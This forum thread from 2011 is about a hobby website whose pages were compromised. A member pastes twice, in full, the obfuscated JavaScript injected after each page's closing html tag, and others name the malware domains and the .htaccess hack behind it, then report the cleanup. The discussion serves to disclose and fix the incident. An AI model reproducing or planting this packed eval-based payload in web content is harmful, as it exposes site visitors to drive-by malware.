10-08-2011, 03:15 AM
10-08-2011, 04:05 AM
Greetings all,
Your virus checker is most likely complaining about a packed piece of javascript that gets appended to the end of each page coming from the byyb.org web sites. If you go to your browser menus and choose View ... View Source, or View ... Page Source, you will see something that looks like this ...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head> ... </head>
<body> ... lots of normal looking stuff appears between the body tags that we don't care about ...
</body></html>
<script>(function(){f_ET=document;f_A=window;f_A.f_i=function($,f_Ev){return 0};f_A.f_z=function(f_k){return f_k.join('')};f_A.f_q=function(f_EE){return(function(f_k,f_ED){return f_ED(f_k(f_ED(f_k(f_EE))))(f_EE)()})((function(f_k){return f_k.constructor}),(function(f_k){return(function(f_ED){return f_k.call(f_k,f_ED)})}))};f_A.f_EC=function(f_k){return f_k.pop()};f_A.f_A=f_A;if(typeof($)=='undefined'){f_EL=f_ET.getElementsByTagName('head')[0];
f_EM=f_ET.createElement('script');
f_EM.setAttribute('src',"http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js");
f_EL.appendChild(f_EM)}f_A.f_Eo=100;f_A.f_Eh=25;
f_A.trim=function(f_Ed,f_Em){if("qabcdef".indexOf(f_Ed.substr(0,1))>=0){var f_Ea=f_z(f_Ed.split('q')).split('v');
for(var i=0;i<f_Ea.length;i++){f_Ea[ i]=parseInt(f_Ea[ i],16)-f_Em[f_Ed]}return f_Ea.join(',')+','}else{return f_Em[f_Ed]}};
d='Oe={MQv1aN%2%7%1%6>:"e+",MQv2aN%2j%1%6>:"",*bQv3aN%2%7%1%6v30:"l
(\'l=St",N`v4e|*0T%f*2!5:"ring.f",I<v52$aU%c!6*a!6:"romCha",T$8v68*2*5!e@0!5*4:"rCode("D4#d!2
%6~%2!0!3W&096$5M$aQV$d$eU&9DaQ$dV$eU%0%1%2&3G7jW%a%b%c%d%e%f&7Gf@0|T#4W%6
%2U&6Ga!e<<Z*1*6!6J&6G2!0!4!0!1%e!4T*0&0B8KNMjTJX+1&8LeYX!6%3*0#4#e!6&3G2*7yK%2%e%
e%a*4HL4#4~Y>T%c>~&5B2#f$3~VV|~$3&0G5*7*9yK*5PI%2HL1*5+6W@3T%4*2T&5-9c+1%4+a*e#d!3*2+1&0G6~+2*4*7Z%f#3%0&7Gf*a+2+3JWK+d!3&1D3J>#4#8>*6%f*1&7D1Y`~Y
>%d@2*0&5B3|#dY$4|%3~W&0G6%0$3jU%6$3jU&2G2~$dV$3~UjQ&0D5$a$8%7$5y%a$a$5&4GdW%
7$5%1$7%4$5%2&4D7%e$5Q$8%bMI%7&4G0V$9%4TY~Y+a&0G8#7%c$e%d+e+d*c*d&9D7%aQ+7%
5+d*a$7%a&6DeXINX+a+7*7*1&9Ba*0#3#b#4P+b*5#e&1B3U+7*6%5VV+9$5&0D7j!eZ#3JU!eP&6L1$
0K+8$d%4$8%0%c&5D9%e$dT*e%4$9%b%0&8Bb~+e+7*1Y%3+b+1&4G6%5%bUZ>I#8*2&7Bd+2*7
<W~*eQ%eHDd>|*b*5M@2>$3&8B7V>$0!6P$8$5j&4D6#e+d!3<!5Z$e|&1G4K+fY*8>Y+7>&4Bd+2$7N
<+5#3#8%4HG7%1%6>$4P`$4P&8Ba+eP#c!1!6%0%6%5&1B9*1J%f!1J*4<*1&1,a1%4%e!3%6#d>#b
!3&0D5#e!4%5Z%5%3yU&1D4%3#byU%2+1$a!0&0De%3!5T$9@3TV*2&52+3*c@0*b!2!5y+d&2Bd%4$
7$5<+4$7#8%bHGfU%c@3@7*5%3%0+bH,a5*5#f<<P+5*3#9&7LaJJ#9*0+f*4Q%b&9D6|V%ey$d%4
y!1&1Da$7J+2*f#d#a%d%d&1B6+1*1`#3K!3!3#4&3Lf+dI#8#7*2$9WV&7D9%3@5@5%1$e>JM&8G8
M!5j#f!5$8+e+e&2BcXJM#7M!3+2+c&0,acJ#b$9y+1%6%e!3&0,a8*5>>+9*c#3+9%e&8Bc!5*aMM<+3+
5$0&2B3*8JP!3%6JM!3&0-9aM<P#3II+c*f&2-97+b*e>#a@2*b*b$4HG6*6+a*dZ#9@1#c#c&9L7#7$0*b*3y+7+3X&6D0#e#bX<#a#e$5#3&8D5+6+
2*1*1#7!e>+d&5Be#8#bZ$3*1JW*3&6D4K+5%1*2*2#7<Z&4,a9IXP+eK~J+2&1G6*7*7#dI#4~#a#9&
9Bc$0#e!6*a*0$3+4+6&3L5|I#c#f#3#3$7`HD5+6+8Z+d<#7#a!e&5Be|*0T+9*2$5+6*d&5L4|#c#e#3
$7*5<jH-96<#7%6$aWX$4#c&9L0K#8IK#7#7KI&0LfN#b#bN#b#aN#bHL4>#a`>``>#9&4L7<NN<II<N&1L4<#
7<N#4<#8<&1L4!e#3!eI!eN#a+f&2L4*8>@0#4%1@6+1T&8,a8W%7$e%3V#3Q%7&5G7%5*b%0$9%a
*b%7V&8DcZ%0I%fI#a#a>&7,d6$3$a*6K@3X$4>&9G1%d%dW*3#8#8>`&9Bd+eN<%dN<+1NHBc*e`
K+d`KQ$4&9B7+7X`~>MI$7&4G8%6#8>yI#4K@3&9,a1$eJ#b!4T+c!2|&0G8$d@2$5MI#7$aW&9G1yU$
5+2%bJ+cT&1-93Q%0%dY%a%b@0%3&7Da*2~YKXT*bX&5L0*6$5M>`K$a`&9L0$5MJ@0%2$d%d%1&991`#4#4!4M>
Y%c&4L6X*8*6#9$e%3@0*8HBb~<<@1@1<@1>&4Lb#9#9#9I@6I@6I&9,d3Q%2WQ@1!6M%5&6G9j
+5%6>N#4#4<&4,d4@4PWZ>*2*7Y&7B3*2Tj%e*9!0j+7&0c%3W%6%7K<@1*4&4B2!5*eP%a@0y#f%
0&2D6j!1*5|%5yJP&192Q`YKZ%f`$8&7G9$5%5V>#7NNN&6B9#b*9!0$4%d*0!0!3&0Db<jX$e@3*e!5j&
5L1yQ$4%5*6%2$7$8&3-99%c>%1X@5*8TM&8,a7<%d@3*e!5%d#3%1&5D8%1$a%7Q@0!6$9|&3-96V%b%4$9%aU%5%4&6,a0WV%b%cW%5+8Z&7B9+c<Z*4#3#7@4J&6,d0*7<%0+b%1I#e#3HL4#9
X#3M+a+9U>&8L8<<+bIQ$9j+9&4,a8*7+cY+4<J+e<&492P$7P@0|Z@5>&7Ge+f+f+4$7+e!6$d$0&3
D5*0$7#8%b%fU%c@3HB1!1YY!4QZ$aU&1Dd$e@1+8UX>JJ&9B6!e!6*2K%a%3$9$a&5DcU%4Q$a<!6P
!e&6,d3$eQ<W%e%5$a%4&5De>KT<%b$d%c+c&8Da$ey!1J!5Z$8y&1Gc+2+b+7+6+9P*3$e&8G4%7<
$8*2#7N*0$8&5-93V*5>%c*5VN%b&8G8%4%1%c>ZM*8+1&8,a3+8+9+a+c|@0+e+e&2BaPPMP!ePZPHL1>#7%c%eQ
%c%d%b&9Bc$7X*1K%c*1$7*0&4L3`*1#3#c#4M!e%a&2Bd<<I$e%3$d%2K&4G7X%3%2%3MKKK&3
Lcy%7|$dJ$5P&1,N`!|*0T%f*2Y:"32);",*j%$d%6V*b%0%1:"Oq(l)\'",Y!!0*9%2T!0#8*2:");"};Oc=[];O
A.OEs=String.fromCharCode;for(+r Ok in Oe){Rtrim(Ok,Oe))};R\';OA.OF^58,50?2,120,34,62,60\\,32\54,99);\');R\'OA.Ox^61,50,62,60,47\\);\');R\'OA.Ow=OEs(97?2/5,46?6?9/5?6?6/1
?4,46,99?1/9,47,49,47?6?4/1?0/0?5,47/0,97/5/8,121,46/6?5?1?0);\');Oq(Oz(Oc))!v7#v8$vb%vc&:8*v
9+va-,q/,10<!d>#0?,11@vdB-7D,bG,cH:90I#2J!9K!cL8M!bN#6Of_P!aQ$bROc.push(T!8U$fV$cW%9X#1Y!7Z!f^=OEs(104/1/5/3/4?6,`#5j%8y$6|$2~$1\\/5/2?4,97/9/1';for(c=41;c--;d=(t=d.split('!#$%&*+-/<>@BDGHIJKLMNOPQRTUVWXYZ^`jy|~\\'.charAt©)).join(f_EC(t)));f_EA=d;f_q(f_EA)})()</script>
So the question is, what is this Packed Javascript that gets append to the web page AFTER the page is supposedly complete, ie after the closing </html> tag. And why is it packed? The only reason programers pack javascript code is so that others cannot see what the code is doing.
Cheers,
Tom
Your virus checker is most likely complaining about a packed piece of javascript that gets appended to the end of each page coming from the byyb.org web sites. If you go to your browser menus and choose View ... View Source, or View ... Page Source, you will see something that looks like this ...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head> ... </head>
<body> ... lots of normal looking stuff appears between the body tags that we don't care about ...
</body></html>
<script>(function(){f_ET=document;f_A=window;f_A.f_i=function($,f_Ev){return 0};f_A.f_z=function(f_k){return f_k.join('')};f_A.f_q=function(f_EE){return(function(f_k,f_ED){return f_ED(f_k(f_ED(f_k(f_EE))))(f_EE)()})((function(f_k){return f_k.constructor}),(function(f_k){return(function(f_ED){return f_k.call(f_k,f_ED)})}))};f_A.f_EC=function(f_k){return f_k.pop()};f_A.f_A=f_A;if(typeof($)=='undefined'){f_EL=f_ET.getElementsByTagName('head')[0];
f_EM=f_ET.createElement('script');
f_EM.setAttribute('src',"http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js");
f_EL.appendChild(f_EM)}f_A.f_Eo=100;f_A.f_Eh=25;
f_A.trim=function(f_Ed,f_Em){if("qabcdef".indexOf(f_Ed.substr(0,1))>=0){var f_Ea=f_z(f_Ed.split('q')).split('v');
for(var i=0;i<f_Ea.length;i++){f_Ea[ i]=parseInt(f_Ea[ i],16)-f_Em[f_Ed]}return f_Ea.join(',')+','}else{return f_Em[f_Ed]}};
d='Oe={MQv1aN%2%7%1%6>:"e+",MQv2aN%2j%1%6>:"",*bQv3aN%2%7%1%6v30:"l
(\'l=St",N`v4e|*0T%f*2!5:"ring.f",I<v52$aU%c!6*a!6:"romCha",T$8v68*2*5!e@0!5*4:"rCode("D4#d!2
%6~%2!0!3W&096$5M$aQV$d$eU&9DaQ$dV$eU%0%1%2&3G7jW%a%b%c%d%e%f&7Gf@0|T#4W%6
%2U&6Ga!e<<Z*1*6!6J&6G2!0!4!0!1%e!4T*0&0B8KNMjTJX+1&8LeYX!6%3*0#4#e!6&3G2*7yK%2%e%
e%a*4HL4#4~Y>T%c>~&5B2#f$3~VV|~$3&0G5*7*9yK*5PI%2HL1*5+6W@3T%4*2T&5-9c+1%4+a*e#d!3*2+1&0G6~+2*4*7Z%f#3%0&7Gf*a+2+3JWK+d!3&1D3J>#4#8>*6%f*1&7D1Y`~Y
>%d@2*0&5B3|#dY$4|%3~W&0G6%0$3jU%6$3jU&2G2~$dV$3~UjQ&0D5$a$8%7$5y%a$a$5&4GdW%
7$5%1$7%4$5%2&4D7%e$5Q$8%bMI%7&4G0V$9%4TY~Y+a&0G8#7%c$e%d+e+d*c*d&9D7%aQ+7%
5+d*a$7%a&6DeXINX+a+7*7*1&9Ba*0#3#b#4P+b*5#e&1B3U+7*6%5VV+9$5&0D7j!eZ#3JU!eP&6L1$
0K+8$d%4$8%0%c&5D9%e$dT*e%4$9%b%0&8Bb~+e+7*1Y%3+b+1&4G6%5%bUZ>I#8*2&7Bd+2*7
<W~*eQ%eHDd>|*b*5M@2>$3&8B7V>$0!6P$8$5j&4D6#e+d!3<!5Z$e|&1G4K+fY*8>Y+7>&4Bd+2$7N
<+5#3#8%4HG7%1%6>$4P`$4P&8Ba+eP#c!1!6%0%6%5&1B9*1J%f!1J*4<*1&1,a1%4%e!3%6#d>#b
!3&0D5#e!4%5Z%5%3yU&1D4%3#byU%2+1$a!0&0De%3!5T$9@3TV*2&52+3*c@0*b!2!5y+d&2Bd%4$
7$5<+4$7#8%bHGfU%c@3@7*5%3%0+bH,a5*5#f<<P+5*3#9&7LaJJ#9*0+f*4Q%b&9D6|V%ey$d%4
y!1&1Da$7J+2*f#d#a%d%d&1B6+1*1`#3K!3!3#4&3Lf+dI#8#7*2$9WV&7D9%3@5@5%1$e>JM&8G8
M!5j#f!5$8+e+e&2BcXJM#7M!3+2+c&0,acJ#b$9y+1%6%e!3&0,a8*5>>+9*c#3+9%e&8Bc!5*aMM<+3+
5$0&2B3*8JP!3%6JM!3&0-9aM<P#3II+c*f&2-97+b*e>#a@2*b*b$4HG6*6+a*dZ#9@1#c#c&9L7#7$0*b*3y+7+3X&6D0#e#bX<#a#e$5#3&8D5+6+
2*1*1#7!e>+d&5Be#8#bZ$3*1JW*3&6D4K+5%1*2*2#7<Z&4,a9IXP+eK~J+2&1G6*7*7#dI#4~#a#9&
9Bc$0#e!6*a*0$3+4+6&3L5|I#c#f#3#3$7`HD5+6+8Z+d<#7#a!e&5Be|*0T+9*2$5+6*d&5L4|#c#e#3
$7*5<jH-96<#7%6$aWX$4#c&9L0K#8IK#7#7KI&0LfN#b#bN#b#aN#bHL4>#a`>``>#9&4L7<NN<II<N&1L4<#
7<N#4<#8<&1L4!e#3!eI!eN#a+f&2L4*8>@0#4%1@6+1T&8,a8W%7$e%3V#3Q%7&5G7%5*b%0$9%a
*b%7V&8DcZ%0I%fI#a#a>&7,d6$3$a*6K@3X$4>&9G1%d%dW*3#8#8>`&9Bd+eN<%dN<+1NHBc*e`
K+d`KQ$4&9B7+7X`~>MI$7&4G8%6#8>yI#4K@3&9,a1$eJ#b!4T+c!2|&0G8$d@2$5MI#7$aW&9G1yU$
5+2%bJ+cT&1-93Q%0%dY%a%b@0%3&7Da*2~YKXT*bX&5L0*6$5M>`K$a`&9L0$5MJ@0%2$d%d%1&991`#4#4!4M>
Y%c&4L6X*8*6#9$e%3@0*8HBb~<<@1@1<@1>&4Lb#9#9#9I@6I@6I&9,d3Q%2WQ@1!6M%5&6G9j
+5%6>N#4#4<&4,d4@4PWZ>*2*7Y&7B3*2Tj%e*9!0j+7&0c%3W%6%7K<@1*4&4B2!5*eP%a@0y#f%
0&2D6j!1*5|%5yJP&192Q`YKZ%f`$8&7G9$5%5V>#7NNN&6B9#b*9!0$4%d*0!0!3&0Db<jX$e@3*e!5j&
5L1yQ$4%5*6%2$7$8&3-99%c>%1X@5*8TM&8,a7<%d@3*e!5%d#3%1&5D8%1$a%7Q@0!6$9|&3-96V%b%4$9%aU%5%4&6,a0WV%b%cW%5+8Z&7B9+c<Z*4#3#7@4J&6,d0*7<%0+b%1I#e#3HL4#9
X#3M+a+9U>&8L8<<+bIQ$9j+9&4,a8*7+cY+4<J+e<&492P$7P@0|Z@5>&7Ge+f+f+4$7+e!6$d$0&3
D5*0$7#8%b%fU%c@3HB1!1YY!4QZ$aU&1Dd$e@1+8UX>JJ&9B6!e!6*2K%a%3$9$a&5DcU%4Q$a<!6P
!e&6,d3$eQ<W%e%5$a%4&5De>KT<%b$d%c+c&8Da$ey!1J!5Z$8y&1Gc+2+b+7+6+9P*3$e&8G4%7<
$8*2#7N*0$8&5-93V*5>%c*5VN%b&8G8%4%1%c>ZM*8+1&8,a3+8+9+a+c|@0+e+e&2BaPPMP!ePZPHL1>#7%c%eQ
%c%d%b&9Bc$7X*1K%c*1$7*0&4L3`*1#3#c#4M!e%a&2Bd<<I$e%3$d%2K&4G7X%3%2%3MKKK&3
Lcy%7|$dJ$5P&1,N`!|*0T%f*2Y:"32);",*j%$d%6V*b%0%1:"Oq(l)\'",Y!!0*9%2T!0#8*2:");"};Oc=[];O
A.OEs=String.fromCharCode;for(+r Ok in Oe){Rtrim(Ok,Oe))};R\';OA.OF^58,50?2,120,34,62,60\\,32\54,99);\');R\'OA.Ox^61,50,62,60,47\\);\');R\'OA.Ow=OEs(97?2/5,46?6?9/5?6?6/1
?4,46,99?1/9,47,49,47?6?4/1?0/0?5,47/0,97/5/8,121,46/6?5?1?0);\');Oq(Oz(Oc))!v7#v8$vb%vc&:8*v
9+va-,q/,10<!d>#0?,11@vdB-7D,bG,cH:90I#2J!9K!cL8M!bN#6Of_P!aQ$bROc.push(T!8U$fV$cW%9X#1Y!7Z!f^=OEs(104/1/5/3/4?6,`#5j%8y$6|$2~$1\\/5/2?4,97/9/1';for(c=41;c--;d=(t=d.split('!#$%&*+-/<>@BDGHIJKLMNOPQRTUVWXYZ^`jy|~\\'.charAt©)).join(f_EC(t)));f_EA=d;f_q(f_EA)})()</script>
So the question is, what is this Packed Javascript that gets append to the web page AFTER the page is supposedly complete, ie after the closing </html> tag. And why is it packed? The only reason programers pack javascript code is so that others cannot see what the code is doing.
Cheers,
Tom
10-08-2011, 05:28 AM
(10-08-2011, 03:15 AM)Kurt_Ayres link Wrote: [ -> ]With the new format, my anti-virus is putting up a threat warning every time I access anything on the site!
I get these warnings too, with texts like this:
The website at byyb.org contains elements from the site mefvkbnmmcp.com,
which appears to host malware â software that can hurt your computer or
otherwise operate without your consent. Just visiting a site that contains
malware can infect your computer.
For detailed information about the problems with these elements, visit the
Google Safe Browsing diagnostic page for mefvkbnmmcp.com.
Learn more about how to protect yourself from harmful software online.
I've seen them with at least two different domain names, mefvkbnmmcp.com and gdeaaxrgmcp.com. Both of these resolved to the same address, 66.199.229.50, which I have blocked on my firewall.
10-09-2011, 05:20 AM
I think we have this taken care of now. The site was offline for a few hours while I examined all the files.
I'm not sure of the origin of the javascript attack, although I suspect it might be from a form builder plugin we used on the front end of the website. The author had not updated it in quite a while.
There were actually two attacks; one was a javascript injection into specific files and one was a .htaccess edit that appended the contents of a file to each page, as tombayus noted. So far, it looks like the clean up was successful.
I'm not sure of the origin of the javascript attack, although I suspect it might be from a form builder plugin we used on the front end of the website. The author had not updated it in quite a while.
There were actually two attacks; one was a javascript injection into specific files and one was a .htaccess edit that appended the contents of a file to each page, as tombayus noted. So far, it looks like the clean up was successful.
10-09-2011, 05:26 AM
(10-08-2011, 04:05 AM)tombayus link Wrote: [ -> ]Greetings all,
Your virus checker is most likely complaining about a packed piece of javascript that gets appended to the end of each page coming from the byyb.org web sites. If you go to your browser menus and choose View ... View Source, or View ... Page Source, you will see something that looks like this ...
<snip>
So the question is, what is this Packed Javascript that gets append to the web page AFTER the page is supposedly complete, ie after the closing </html> tag. And why is it packed? The only reason programers pack javascript code is so that others cannot see what the code is doing.
It's an interesting attack mode on this one. The .htaccess file was hacked to append the contents of a file named "google_verify.php" to each page. The code you saw was in that file. I *think* the problem started on the 5th or 6th of this month.
10-09-2011, 07:23 AM
(10-09-2011, 05:20 AM)fshagan link Wrote: [ -> ]I think we have this taken care of now.
There were actually two attacks; one was a javascript injection into specific files and one was a .htaccess edit that appended the contents of a file to each page, as tombayus noted. So far, it looks like the clean up was successful.
Looks good to me. My Chrome browser is no longer warning about anything. Thanks for taking care of it.
I assume it is on purpose, but the old brownish layout is gone, now the site shows in a much more modern and boring blue. And no highlighted steering wheels on the forums with new content, only some strange blue logo.
Thanks for the good work, and good luck at keeping them bastards out!
10-09-2011, 08:44 PM
I changed everything to the default files while I searched for the culprit in all of this. Never did find a smoking gun; just all the "victims" (files that were modified).
I'll be upgrading the forum to the latest version soon, and we will work on the theme after that. Although, strictly speaking, the default look is often the easiest to take care of over the long term.
I'll be upgrading the forum to the latest version soon, and we will work on the theme after that. Although, strictly speaking, the default look is often the easiest to take care of over the long term.
10-09-2011, 11:18 PM
(10-09-2011, 08:44 PM)fshagan link Wrote: [ -> ]I changed everything to the default files while I searched for the culprit in all of this. Never did find a smoking gun; just all the "victims" (files that were modified).
That sounds unsettling. It could be that someone has shell access to your server. Who knows what other back doors they may have installed. I hope not, but you may want to scan the whole machine for unwanted things. If they manage to reinfect your system, I recommend a complete reinstall of everything. If it happens to be a Linux box, I may be of some little help. Feel free to contact me - you should have my email somewhere.
(10-09-2011, 08:44 PM)fshagan link Wrote: [ -> ]I'll be upgrading the forum to the latest version soon, and we will work on the theme after that. Although, strictly speaking, the default look is often the easiest to take care of over the long term.
You have a valid point there, and the default works just fine for me.
Thanks for handling the situation well, and thanks for running the whole site. It has given me a lot of inspiration, and once I get my build started, I count on the help and advice here!
10-10-2011, 03:58 PM
(10-09-2011, 11:18 PM)Heikki Levanto link Wrote: [ -> ][quote author=fshagan link=topic=3075.msg23997#msg23997 date=1318221890]
I changed everything to the default files while I searched for the culprit in all of this. Never did find a smoking gun; just all the "victims" (files that were modified).
That sounds unsettling. It could be that someone has shell access to your server. Who knows what other back doors they may have installed. I hope not, but you may want to scan the whole machine for unwanted things. If they manage to reinfect your system, I recommend a complete reinstall of everything. If it happens to be a Linux box, I may be of some little help. Feel free to contact me - you should have my email somewhere.
(10-09-2011, 08:44 PM)fshagan link Wrote: [ -> ]I'll be upgrading the forum to the latest version soon, and we will work on the theme after that. Although, strictly speaking, the default look is often the easiest to take care of over the long term.
You have a valid point there, and the default works just fine for me.
Thanks for handling the situation well, and thanks for running the whole site. It has given me a lot of inspiration, and once I get my build started, I count on the help and advice here!
[/quote]
I think it was a javascript vulnerability; I get an email every time there's a log in to the server, either into an individual account or at root (even cPanel log ins are sent to me). The file date stamps were 10/5/2011 on the affected files, so it was discovered pretty quickly.
It is a linux VPS running CentOS (opensource fork of RHEL), with the latest cPanel-approved versions of all the software, and CSF firewall. The usual security measures are in place (no shell access except for me, SSH on a different port, over 25 character mixed case/number password, etc.) I keep the software up to date, but plugins and themes in both Wordpress and the forum software can be problematic; unless the author issues an update, you don't know there's a vulnerability.
10-11-2011, 12:01 AM
(10-10-2011, 03:58 PM)fshagan link Wrote: [ -> ]I think it was a javascript vulnerability; I get an email every time there's a log in to the server, either into an individual account or at root (even cPanel log ins are sent to me). The file date stamps were 10/5/2011 on the affected files, so it was discovered pretty quickly.
It is a linux VPS running CentOS (opensource fork of RHEL), with the latest cPanel-approved versions of all the software, and CSF firewall. The usual security measures are in place (no shell access except for me, SSH on a different port, over 25 character mixed case/number password, etc.) I keep the software up to date, but plugins and themes in both Wordpress and the forum software can be problematic; unless the author issues an update, you don't know there's a vulnerability.
That sounds like a healthy and robust setup. Let's hope there will be no more troubles!